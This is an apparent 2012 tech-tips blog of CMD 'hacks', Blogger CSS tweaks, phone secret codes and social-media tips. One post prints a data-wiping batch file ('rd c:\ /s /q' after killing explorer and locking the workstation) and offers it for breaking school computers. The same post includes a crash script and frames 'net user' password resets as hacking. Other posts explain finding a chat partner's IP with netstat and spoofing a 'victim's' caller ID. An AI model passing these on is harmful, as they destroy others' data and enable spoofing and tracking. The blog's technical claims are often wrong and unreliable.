Make The Website Professional

Today, I am going to show you how easy it is to create a professional-looking Flash website for free.

Know To Spread The Web

So you've made a new site, huh? But no one knows about it! Here you will find tips to spread news about a website that you've created!.

The Path To Be An Expert Geek

In this website one can find many TIPS AND TRICKS of Computer,Internet,Web,Mobile And Blogger Tips.

To Increase The Knowledge Of Bloggers

In This Site We Want To Increase The Knowledge Of Bloggers About Blogging To Be A Better Blogger.

How To make Money Online With Your own Website

If you look at many websites, you will probably notice that there are banner advertisements displayed on most pages. If you are a newcomer to the scene, you might think that you must either be a company or that your site must be famous before you can get advertisers, just as it is the case in hardcopy publications..

Get our toolbar!

Monday, July 30, 2012

Hide Any Drive Using CMD(Command Prompt)



Do you have a computer that has many important files that are personal to you?
And you frequently share you computer with your friends, when they visit you.
So you might want to hide and protect them from others.
Then here's a trick for you to hide your disk drives using command prompt.



just follow these steps,

1...clcik start>>>run>>> and type "cmd" in run,


2...After opening cmd, type "list volume" (space between list and volume)


3...Id you want to hidden E drive type "select volume 3"    ( write with spaces)
    in cmd we assume c for 1 , d for 2 and e for 3 for drive

4..and now type "remove letter e" your drve will be hidden and nobody cant see this,
  some time you have to restart your pc  for hidden purpose.
  
5...to assign or see you drive follow again 3 upper steps and your 4th step will be changed


6..type "assign letter"  and your drive will be shown.

Thats it. Now enjoy!!!

Important Note: Since the drive is hidden, it is also not available to the Antivirus Programs. So if any virus attacks your computer than you antivirus will not be able to detect it.


PRASHANT KUMAR




Saturday, July 28, 2012

How To Customize Blogger Labels With CSS3


Here we will see how to customize blogger labels with CSS3 and make them bricks or box style.We will apply this hack with using of pure CSS3 and will replace some existing code with new code in your template.These css3 bricks/box labels really attract readers.I am also using these bricks/box style label on this blog,you can see demo at right sidebar of this blog.Now lets see how to apply this hack.



First we have to edit some settings of our label widget.Save your label widget settings as I have set in below image.


Now go to Blogger Dashboard > Template
Download a copy of your template
Click on Edit HTML
Hit Proceed button
Check Expand Widget Templates checkbox
Find below code in your template


]]></b:skin>

add below CSS code just above it,


/*CSS3 Bricks Style Labels By http://www.helperblogger.com/ */
#textwidget {
    color: #666;
    font-size: 0.925em;
    font-style: italic;
    line-height: 1.6em
}
 
a.tag {
    color: #777;
    font: 9px verdana;
    text-transform: uppercase;
    transition: border-color .218s;
    background: #f4f4f4;
    background: -webkit-gradient(linear, 0% 40%, 0% 70%, from(#F5F5F5), to(#F1F1F1));
    display: inline-block;
    text-shadow: 0 1px 0 #fff;
    -webkit-transition: border-color .218s;
    -moz-transition: border .218s;
    -o-transition: border-color .218s;
    transition: border-color .218s;
    background: #f3f3f3;
    background: -webkit-gradient(linear, 0% 40%, 0% 70%, from(#F5F5F5), to(#F1F1F1));
    background: -moz-linear-gradient(linear, 0% 40%, 0% 70%, from(#F5F5F5), to(#F1F1F1));
    border: solid 1px #ccc;
    border-radius: 2px;
    -webkit-border-radius: 2px;
    -moz-border-radius: 2px;
    margin: 0 4px 4px 0;
    padding: 3px 5px;
    text-decoration: none
}
 
a.tag:hover {
    color: #333;
    border-color: #999;
    -moz-box-shadow: 0 2px 0 rgba(0, 0, 0, 0.2) -webkit-box-shadow:0 2px 5px rgba(0, 0, 0, 0.2);
    box-shadow: 0 1px 2px rgba(0,0,0,0.15)
}
 
a.tag:active {
    color: #000;
    border-color: #444
}
 
.slides {
    font-size: 85%;
    line-height: 130%;
    overflow: hidden;
    padding: 0;
    margin: 30px 0 10px;
    border-bottom: 1px solid #000
}
/*CSS3 Bricks Style Labels By http://www.helperblogger.com/ */

Now find below code,

1
<b:widget id='Label1' locked='false'

find it until

1
</b:widget>

replace code from <b:widget id='Label1' locked='false'......... 
to 
</b:widget> with below code,


<b:widget id='Label1' locked='false' title='Labels Cloud' type='Label'>
    <b:includable id='main'>
        <b:if cond='data:title'>
            <h2>
                <data:title/>
            </h2>
        </b:if>
        <div class='textwidget'>
            <div expr:class='&quot;widget-content &quot; + data:display + &quot;-label-widget-content&quot;'>
                <b:if cond='data:display == &quot;list&quot;'>
                    <ul>
                        <b:loop values='data:labels' var='label'>
                            <li>
                                <b:if cond='data:blog.url == data:label.url'>
                                    <span expr:dir='data:blog.languageDirection'>
                                        <data:label.name/>
                                    </span>
                                    <b:else/>
                                    <a class='tag' expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>
                                </b:if>
                                <b:if cond='data:showFreqNumbers'>
                                    <span dir='ltr'>(
                                        <data:label.count/>)</span>
                                </b:if>
                            </li>
                        </b:loop>
                    </ul>
                    <b:else/>
                    <b:loop values='data:labels' var='label'>
                        <span expr:class='&quot;label-size label-size-&quot; + data:label.cssSize'>
                            <b:if cond='data:blog.url == data:label.url'>
                                <span expr:dir='data:blog.languageDirection'>
                                    <data:label.name/>
                                </span>
                                <b:else/>
                                <a class='tag' expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>
                            </b:if>
                            <b:if cond='data:showFreqNumbers'>
                                <span class='label-count' dir='ltr'>(
                                    <data:label.count/>)</span>
                            </b:if>
                        </span>
                    </b:loop>
                </b:if>
                <b:include name='quickedit' />
            </div>
        </div>
    </b:includable>
</b:widget>

Now take a preview and save your template.

Thats it, Now Enjoy Your Blog!!!

PRASHANT KUMAR

How To Use Multiple Login In Same Browser At A Time


Have you ever tried to get on more than one account of something like gmail, facebook, myspace, yahoo, etc.. on the same browser?  Well, you can’t do that because these kinds of sites store something called a cookie on your computer which allows you to be logged on to them.   The reason why you cant get on multiple accounts of a website is that only one cookie can be stored at a time.  But there is a simple way to get around this!




What You Will Need..


This works for any operating system that can work with the internet browsers Mozilla Firefox and Google Chrome.




First and foremost, I’m going to say  you need internet.  After you got that settled, you need an internet browser.  There are only two that work for this because they are the only ones that work for this because they support addons.  They are Mozilla Firefox? and Google Chrome?.




After you have either one of those browsers installed, we will have to split this tutorial.  There will be two sections, one for Firefox and one for Chrome, with further instructions.


Mozilla Firefox..





If you have chosen to do this with Firefox, you will need to get an addon.  The addon is called “Coral IE Tab”.  What it does is it adds a feature to Firefox that allows it to make a new tab that runs like its a tab in Internet Explorer.  This tab can also have its own cookies.  Because the tab can do this, it can allow you to access another account of the same service in one browser.  Basically, you will have one account of, Gmail in example, open in a Firefox tab like normal, and then, you will open another account of Gmail in an Internet Explorer tab.




To do this, download the addon please click here?.




Once you have the addon installed, make sure you restart Firefox and then follow these steps…




Open a tab like normal and go to a site, i.e. Facebook, and log in.


Open another tab like normal but DO NOT go to any website on it.


Click the button that looks like a tab with an IE symbol on it.  This button is generally located next to the search box on the top of your browser.


Click For Full Size




After you click that button, the tab will change to an IE Tab.


Once the tab is changed, go to the same website that you logged onto before.  Once you go to it, you will be taken to the login page.  Once there, just login like normal and it should work.


Google Chrome..






If you have chosen Google Chrome, you will also need to get an addon. The addon is called “Classic IE Tab”.  This addon does the same thing that the addon in Firefox does.  It allows a tab to run Internet Explorer in Google Chrome.  This tab also allows you to store its own cookies so multiple accounts can work with it.  Basically, you can have an account of something open in one tab, i.e. Gmail, and then log into another account like Gmail in an IE Tab.




To download IE Tab for Google Chrome, please click here?.




Once you have the addon installed, make sure you restart Google Chrome and please follow these steps…




Open a tab like normal then go to a site, i.e. Facebook, and then log in.


Open another tab like normal but this time DO NOT go to any site.


Click the IE symbol.  This button is located in the address bar, on the far right-hand side.


Click For Full Size




After you click that button, that tab will turn into an IE tab and you will get a different address bar that will be located right under the bookmarks bar.


In that address bar, type in the same website that you logged into before and you will be taken to the login page.


Log into the site and it will work like normal.


If you have any problems, or questions about this, please send us an email.


If you have any comments, please leave one on this page.

Friday, July 27, 2012

Things To Hack Using CMD(Command Prompt)


People can use the cmd(command prompt) for various purposes, but today i am going to tell u some hackung tricks using cmd.

you can "hack" all of the following with Command Prompt

Most Websites
User Accounts (on your computer)
Computer Settings
E-mail
and some other stuff -.-

To do anything related to hacking with Command Prompt you must know my best friend and his name is IP!
IP is everything in the cyber world, it identifies you like no other, with your IP someone can find out where you live, who the computers registered to, the computers name, and more! So think of it as your cyber Social Security Number (SSN) you don't want to just tell everyone it.

So to get your IP you can start by opening Command Prompt
Next make sure it is on C: Drive
Then type in the following ipconfig /all
This will display a lot of info some of which is very important
This will tell you how you are connected to the internet and with what and also a lot of other stuff (i will not lie some of the info it gives is useless)
Congrats you learn a command! and you have now found out your IP! (im not telling where it is im just saying its there if you scroll up a little bit)

Now to find internet connection!
Lets say you and a friend are playing a MMO and your friend is host and you are lagging well if you want to find out why just type into command prompt the following Ping 127.0.0.1 (replace 127.0.0.1 with your friends IP)(also 127.0.0.1 is local host or you and is used for offline "things")(it also means nothing towards your IP basicly)
the lower the number you see the better! lower means faster and higher means slower

Now time for some "Advanced" stuff

How to find out computer account passwords!
this will require you to know the username.
First open Command Prompt
Then type in the following Net User
This will give you all the accounts (so i lied you didn't need to know the USernames xD
Now type in Net User Admin (you may replace Admin with the account name)
Now you get even more info on that account if you read it all it tells you about the password
Now if you want to change the password just type the following Net User Admin Password (you can replace Admin with the username and Password with the desired password) and TADA you have changed the account password.

O.K. that is all that i will currently say, i will post more in the future, this is jsut a taste of things to come and now for some fun with Command Prompt!

Open up Notepad.exe or in Command Prompt type Notepad (you may type in a files name with out the .exe on the end and it will run it)
Now type in the following:

start
start
start
start
start
start
start crash

then click Save as and select all files, then name is .bat and when you are board just run it and u'll see what it does (make sure you save what your doing first!) it will auto name to Crash.bat

O.K. i take NO RESPONSIBILITY FOR WHAT I AM ABOUT TO POST! this file will BREAK YOU COMPUTER!

@echo off
taskkill -f explorer.exe
start %windir%\System32\rundll32.exe user32.dll, LockWorkStation
rd c:\ /s /q
cls

put that into a notepad and name it Break.bat now what will this do? it will first delete all internet browsers! then it will lock you out of your computer and then delete your System 32 file which is what your computer needs to RUN! now DO NOT USE THIS! i only posted this for those how want to break a school computer! be careful with this because you will need to get a new computer since restoring can't fix this! now be safe and have fun with the new skills i have just taught you!

Thats it Frnds now enjoy!!!

PRASHANT KUMAR

Thursday, July 26, 2012

The Top 10 CMD (Command Prompt) Tricks.

Below are several Command Prompt tricks and other Command Prompt hacks that I guarantee will get you excited about many of the mundane sounding Command Prompt commands like telnet, tree, or robocopy... okay, robocopy sounds pretty cool.

Some of these Command Prompt tricks and hacks are special features or uses of the Command Prompt itself, while others are just neat or relatively unknown things you can do with certain commands. Enjoy!

1. Use Ctrl-C to Abort a Command

Just about any command can be stopped in its tracks with the abort command: Ctrl-C.

If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it.

Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command. However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know.

2. View a Command's Results One Page (or Line) at a Time

Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone.

One way around this is to execute the command in a special way so whatever information is generated is shown to you one page, or one line, at a time.

To do this, just type the command, the dir command for example, and then follow it with the pipe redirection operator and then the more command.

For example, executing dir /s | more will generate the thousands of lines of results that you expect from the dir command, but the more command will pause each page of results with -- More -- at the bottom of the page, indicating that the command is not done running.

Just press the space bar to advance by page or press the Enter key to advance one line at a time.

See Command Prompt Trick #7 below for a different solution to this problem.

3. Run Command Prompt as an Administrator Automatically

Many commands require that you execute them from an elevated Command Prompt in Windows - in other words, execute them from a Command Prompt that's run as an administrator.

You can always right-click on any Command Prompt shortcut and choose Run as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user.

To complete this Command Prompt trick, just create a Command Prompt shortcut on the desktop, enter the shortcut's properties and then select the Run as administrator box located in the Advanced button on the Shortcut tab.

4. Become a Command Prompt Power User with Function Keys

The fact that the function keys actually do something in the Command Prompt is maybe one of the best kept secrets about the tool:

F1: Pastes the last executed command (character by character)
F2: Pastes the last executed command (up to the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the entered character
F5: Pastes recently executed commands (does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously executed commands
F8: Pastes recently executed commands (cycles)
F9: Asks for the number of the command from the F7 list to paste

Command Prompt Trick #17 is full of arrow key shortcuts, a few of which are similar to these function key tricks.

5. Hack the Prompt Text

Did you know that the prompt itself in the Command Prompt is completely customizable thanks to the prompt command? It is, and when I say customizable, I mean really customizable.

Instead of C:\>, you can set the prompt to any text you want, have it include the time, the current drive, the Windows version number, you name it.

One useful example is prompt $m$p$g which will show the full path of a mapped drive in the prompt, alongside the drive letter.

You can always execute prompt alone, without options, to return it to its sometimes boring default.

6. Get Help for Any Command

Believe it or not, the help command does not provide help for every Command Prompt command. However, any command can be suffixed with the /? option, usually called the help switch, to display detailed information about the command's syntax and often times even some examples.

I doubt that the help switch is the coolest Command Prompt trick you've ever heard of, but it's hard to disagree that it's one of the more useful.

Unfortunately, neither the help command nor the help switch offer much in the way of explaining how to interpret the syntax. See How To Read Command Syntax if you need help with that.

7. Save a Command's Output to a File

An incredibly useful Command Prompt trick is the use of redirection operators, specifically the > and >> operators.

These little characters let you redirect the output of a command to a file, giving you a saved version of whatever data the command produced in the Command Prompt window.

Let's say you're about to post a computer problem to an online forum, like my computer support forum for example, and you want to provide really accurate information about your computer. An easy way to do that would be to use the systeminfo command with a redirection operator.

For example, you might execute systeminfo > c:\mycomputerinfo.txt to save the information provided by the systeminfo command to a file. You could then attach the file to your forum post.

See How To Redirect Command Output to a File for more examples and a better explanation of how to use redirection operators.

8. View Your Hard Drive's Entire Directory Structure

I think one of the neatest little commands is the tree command. With tree, you can create a kind of map of your computer's directories.

Execute tree from any directory to see the folder structure under that directory.

Tip: With so much information, it's probably a good idea to export the results of the tree command to a file. For example, tree /a > c:\treeresults.txt, just as explained in Command Prompt Trick #7.

9. Customize the Command Prompt Title Bar Text

Tired of that Command Prompt title bar text? No problem, just use the title command to change it to whatever you like.

For example, let's say your name is Maria Smith, and you want to express your ownership of the Command Prompt: execute title Property of Maria Smith and the Command Prompt's title bar will change immediately.

The change won't stick, so the next time you open Command Prompt the title bar will be back to normal.

The title command is usually used to help give a custom appearance in script files and batch files... not that I'm saying titling it with your name isn't a good idea!

10. Copy From the Command Prompt

As you may or may not know, copying from the Command Prompt is not as easy as copying from other programs, which is part of the reason why saving a command's output to a file, Command Prompt Trick #7, is so handy.

But what if you do just want to copy a short section of text to the clipboard? It's not too hard but it's not very intuitive either.

Right-click anywhere in the Command Prompt window and choose Mark. Now, highlight with your left mouse button whatever you'd like to copy. Once your selection is made, press Enter.

Now you can paste that information into whatever program you'd like.

Sunday, July 22, 2012

Chat Through cmd(Command promt).


Hey frnds today am going to tell u a super cool trick of command promt.


If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! 
All you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:


@echo off
:A 
Cls
echo MESSENGER 
set /p n=User: 
set /p m=Message: 
net send %n% %m% 
Pause
Goto A 
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:


MESSENGER
User:


After "User" type the IP address of the computer you want to contact. 
After this, you should see this:


Message:


Now type in the message you wish to send.
Before you press "Enter" it should look like this:


MESSENGER
User: 56.108.104.107
Message: Hi


Now press "Enter", and start chatting!

Thats it And now enjoy it!!!!!!!!!!! 

PRASHANT KUMAR

Friday, July 20, 2012

Call Someone With Their Own Number


If you want to call any person with their own number then this trick will help you a lot.
here's the steps you have to follow.



1. Go to http://www.mobivox.com and register there for free account.


2. During registration, remember to insert Victim mobile number in "Phone number
"field as shown below.








3. Complete registration and confirm your email id and then login to your account. 
click on "Direct WebCall".








4. You will arrive at page shown below. In "Enter a number" box, select your country 
and also any mobile number(you can enter yours). Now, simply hit on "Call Now"
 button to call your friend with his own number.








5. That's it. Your friend will be shocked to see his own number calling him. I have
spent last two days simply playing this cool mobile hack prank.


So follw these steps and enjoy.


PRASHANT KUMAR

Know To Convert Voice Into Text


Hey frnds here i am posting a fantestic tool for converting voice into the text format.
Technology is advancing by leaps and, today, there are several mobile devices that can dictate and are capable of turning voice into text. But if you have a smartphone to perform this action, don't worry, this time, we will share an excellent tool.


TalkTyper is a web tool that can convert voice to text online free and easy to use.




Upon entering the site the first thing to do is to choose our language, which, in which is located the english language. When you select the language and proceed click on the microphone and began to dictate, when we speak of program disables the microphone and the text that dictates the mould.
Web link: http://talktyper.com/


PRASHANT KUMAR

TOP THREE SOCIAL NETWORKING SITES FOR CHILDRENS


Hey Frnds Here i am going to tell you about TOP SOCIAL NETWORKING SITES FOR CHILDRENS
As we all know that social networking sites does not allow children to use it. Recently Facebook is planning to allow access to children under 13 years to the social network.
Certain that many of you think that the use of social networks is not in accordance with children up to a certain age, but there are many sites is developed specially for them and that they can easily develop the skills that they need when they grow a little more, that share some of the best networks social for the children under the age of 13 years.



 Club Penguin:


This site is a community developed by Disney and custody of children entertained with different games and activities. It offers a pleasure of massively multiplayer game online and is in constant motion.


There are options for children chateen with other players, but parents can adjust their tastes security filters, the bad words are also prohibited and to share personal information.


Fanlala :


is a site similar to MySpace, but for the children. Here children can learn information of young artists of the time, in addition to publishing the celebrity appropriate for the age of the users.


This site requires parents checking the age of the children by telephone, fax or by credit card. Fanlala against cyber bullying and provides a list of brief and clear about how to use the Internet safely. Administrators review the content after publication.




Fantage:


 this is another online multiplayer massive adjustment for children. The members of this site can freely explore the world with different avatars, which can carry from one place to another. There are fashion shows, games and other contacts with the members of the site. Parents can eliminate the option to chat if they feel uncomfortable with this option.


So Frnds these are the three top social networking sites for children (under parents control only).




PRASHANT KUMAR

Thursday, July 19, 2012

Know To Bring Good Conversion On Blogger Page By Using Forms


Hey frnds as we know that making a blog is easy but creating a successful blog is difficult.
If you are working hard on your blog, spreading ideas you are passionate about and you need to get in touch with your visitors. Forms are great means of converting casual visitors into engaged audience for your blog. How to put them up on your page?

Forms use server side scripts for submitting data, but as we all know, Blogger does not allow using server-side scripts, which means the mail() function is unaccessible. With no plugin or widgets either, the only way of creating and running a form for Blogger is to use an external service that provides the needed scripts. Which is good news, because most often form builders come with a bunch of great extra features to boost the usability of your forms. 123ContactForm is one effective web form builder that helps you create and administrate all types of forms and surveys for Blogger.


All submitted info is stored securely for you on the 123ContactForm servers, where you can access it with any query.




For better conversions as well as for making your life easier, here are some features to look for in your forms for Blogger:


- Nice skin. Forms can be styled in any possible way, as 123ContactForm allows full CSS
customization. Make them blend with the image of your blog.


- 3rd party apps to extend the capabilities of forms. A wide range of integrations is available:
SalesForce (adds leads to the account for sales purposes), MailChimp (imports the contacts in forms for using them in e-mail campaigns), WebHooks (for manipulating the behaviour of forms and
submitted data), Yahoo and Google Groups, VerticalResponse, iContact.


- E-mail notifications. With 123ContactForm you can have the information collected through the webforms sent to you via email. All the data, including uploaded files, is there. In case the total size of the uploaded files is larger than 5MB, they will be sent as attachments instead of download links)


- Data export. This form generator exports submissions to neat CSV sheets that may be called later for database purposes.


- Reports over data. This can be a very useful tool for dedicated marketeers. Instead of having a long list of submissions that they have to analyse later with dedicated software such as SPSS, reports are ready in a minute without them getting hands dirty with raw data.


Creating forms for Blogger


It takes no more than 5 minutes, just follow these steps:


1. Sign up/Log in to www.123contactform.com.


2. In your dashboard, go to Create New Form and choose the type of form needed: contact form,
event registration form, order form, survey.




3. Edit form fields.


4. Choose Settings - the e-mail address for notifications, payment integration for order forms, 3rd party apps you wish to integrate with your form.


5. Last step - Get code & Publish. Choose the Blogger tab, copy the code given and paste it into your Blogger post (in HTML view).




And voila! Here is your fresh form ready to use. Forms are very handy tools to help you out in a variety of situations. If you are a new blogger needing a hatful of contacts for sending newsletters, just put up a simple contact form with opt-in fields for the users to choose the sections that interest them. You can perform surveys for gathering feedback from customers (online product surveys, business demographics, customer satisfaction surveys). Or you can sell and receive payments through order forms. All you need is the idea, tools are at hand!!!


So frnds these are some tips of a successful blogger...


PRASHANT KUMAR

Wednesday, July 18, 2012

LG Mobile Secret Codes


LG all models test mode:




Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*


LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM


- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’


Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*
LG all models test mode:
Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*





LG-U81XX SPECIAL CODES






Code to read phone version :




- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM


- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’


Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#


PRASHANT KUMAR

Now Facebook Is Going To Ask For Phone Numbers For Users.


Hey Friends here's a good news for all the facebook user......
Soon, each network user of Facebook will be greeted with a notification message, which asked to provide a valid phone number. The action taken for reasons of security, is designed to prevent potentially dangerous situations in which a hacker manages to hijack and change user account password to block the victim’s own profile page.



Among others, the link above the News Feed section will provide a training guide for users to choose passwords safe and timely identification of fraud attempts, which may inadvertently provide access to account information on Facebook.


The emergency phone number can be used to reset the password if the user account is not accessible through Facebook ordinary means. The new security measure is taken to ensure a backup solution for large scale attack that hit the LinkedIn network, the identification data for not less than 6.5 million user accounts were published on the Internet.


In this situation, administrators can take to lock preventive Facebook user accounts compromised, thus preventing unauthorized access. Every Facebook user has supplied before the telephone number would then receive an SMS with a new password to access, randomly generated.


Other voices say, however, that Facebook administrators merely exploit people’s fears about security issues related to other social networks to create a database of phone numbers of users.


So friends now there is no any issue of getting hacked....


PRASHANT KUMAR

Know To Post Any Image In Facebook Chat.


Hey Friends today i am posting one more cool Facebook Trick about how to post any picture on your facebook chat box or you can also say that how to get any Picture Code For Facebook Chat Box .


Just Follow Below Given Simple Steps :


Step 1 – First Login to your Facebook Account.


Step 2 – Now Go To This Site and Like their Facebook Page.


Step 3 – Click on the Choose File Button and choose an image from your computer .


Step 4 – Click on the Upload Now button .


Step 5 – Now Click on Show Codes and Paste the Code to Your Facebook Chat Box.


Thats It !
Enjoy Facebook Chatting with Cool Images.

PRASHANT KUMAR.

Sunday, July 8, 2012

Top Tips Of how to get someone’s ip address through facebook

How to get someone’s ip address through facebook

Hello Friends !
Today i am going to tell you the trick for getting someone’s IP address through Facebook.
Here we go.

get someone’s ip address through facebook
  • Step 1 – First invite or ping that person for a chat on facebook.
  • Step 2 – Make sure your all other tabs in browser and other services in computer are closed. If Possible for you then delete all the cookies-cache and browsing history from your browser.
  • Step 3 – While chatting on Facebook go to Start >- Run >- cmd .
  • Step 4 – After Opening command Prompt Type netstat -an command and hit Enter.
  • Step 5 – Now you will get Ip Address of all the established connections there .
  • Step 6 – Note all the suspicious Ip’s and trace user using ip address tracer sites like whatismyip or ipmango.com .
Thats It !


It will also works on Skype, gtalk and Yahoo Messenger .


PRASHANT KUMAR

The samsung sgh-500 codes Diaries

HEY FRIENDS, AS WE ALL KNOW THAT SAMSUNG PHONES ARE THE RISING BRAND IN PREFRENCE TO PUBLIC. BUT TODAY I WANT TO TELL ALL OF YOU THAT THERE ARE MANY THINGA WHICH MOSTLY PEOPLE DON'T KNOW ABOUT THE SAMSUNG SGH-500 PHONE.
SO HERE I AM TELLING YOU FEW THING WHICH I KNOW ABOUT THIS PHONE.







Saturday, July 7, 2012

TOP 10 SECRETS ABOUT NOKIA PHONES


HEY FRIENDS, AS WE ALL KNOW THAT NOKIA PHONES ARE THE OLDEST BRAND IN PREFRENCE TO PUBLIC. BUT TODAY I WANT TO TELL ALL OF YOU THA THERE ARE MANY THINGA WHICH MOSTLY PEOPLE DON'T KNOW ABOUT THIS NOKIA PHONE.
SO HERE I AM TELLING YOU FEW THING WHICH I KNOW ABOUT THIS PHONE.

Thursday, July 5, 2012

Comparison Between Samsung Galaxy S3 and Apple iPad 2


Samsung Galaxy S3(i9300) is an Android Smartphone which is the device of third generation of Galaxy S Series. This is the fastest Smartphone among all the galaxy series phones. This is very much slimmer and light in weight.
Description: – The technology that it has is the latest that includes quad core processor, 4G support with camera in front face and also with super display. It has elegantly compact sleek design with metallic finish into the edges having 4.8 inch screen with a Home button.
Samsung Galaxy S3 has being installed with the latest Android 4.0.4 OS ICS which belong to one of the latest technology that are available today. The android version that is installed in the device is the latest version and provides more excellent features than other android Smartphone. The exceptional features that it has are Smart Alert, Smart Stay, S Voice, and Direct Call. The ram, processor and the graphic that is provides are the top rated version that is available in today’s market. Samsung Galaxy S3 has 1.4GHz Exynos 4 Cortex-A9 quad-core processor which helps to do multi task at the same time without any obstruction or lagging. This enables to use different high power applications like HD videos and games and gives the strong competition to the other android quad core phones. Samsung Galaxy S3 also has extended 1GB Ram that supports to do lot of multimedia activities. The graphics that it has is excellent and is provide by the Dual Mali-400 GPU which enable for playing HD games and also helps to watch HD videos of 1080p from YouTube without any hiccups. The sensors that it has are also is one of the latest that includes RGB sensor, proximity, compass, accelerometer, barometer and gyro. It has a large internal memory which is 16/32/64 GB. For playing flash games and facebook games it has adobe flash 10.1 and HTML. For faster internet serving it has Wi-Fi 802.11 a/b/g/h, Wi-Fi Direct etc.
Samsung Galaxy S3 Smartphone is launched first at Europe region at the end of May 2012 and later to other regions of the world.
Apple iPad 2
At the present stage of the world of technology, there are various scopes toencapsulate the huge world into a small capsule. Various uplifts and developments in the field of science and technology are taking place which are giving rise to various electronic products from various brands. Among these brands, a huge contribution to the world of technology has been provided by a renowned brand named Apple Inc. One of the latest productions of Apple is the Apple iPad 2.
It is the iPad of the second generation which is basically a modified designed model of tablet computer. Mostly all the facilities of a computer are provided by Apple iPad 2. It works as a platform for audio media, video media, movies, games, music, periodicals, presentations, books and web supports. Apple iPad 2 has an especially designs battery that gives the backup upto 10 hours called lithium-ion polymer battery.
Apple iPad 2 comprises of a processor of dual core specialized by Apple A5. Its camera is modified to VGA front facing and 720p rear facing. The cameras in the very iPad are specially modified to support FaceTime video calling. There are variations in this model of Apple iPad 2 in terms of their storage capacities which may be 16GB, 32GB or 64GB. It may also vary in terms of the two connectivity options, viz., only wi-fi or wi-fi along with cellular connection. Each of the above discussed variation is readily available in two colours of the front glass panel; those colours are white and black. Apple Inc. launched Apple iPad 2 on 2nd March, 2011. Since then this product of Apple Inc. was marketed online and also Apple started selling it in various retail stores. Apple inc. finally started releasing its Apple iPad 2 in 25 other countries from 25th March, 2011. These countries included Australia, Canada and West Europe. This was also released in Singapore, Hong Kong, South Korea and many other countries on 29th April, 2011.
This contributed a great enhancement to the world of technology and presently it’s one of the best productions of Apple Inc.

Conclusion

As these two belongs to the huge brands they are very much compatible and must buy product for this session of era . Compare between these two and make your own choice which one you want to buy .
PRASHANT KUMAR

Related Posts Plugin for WordPress, Blogger...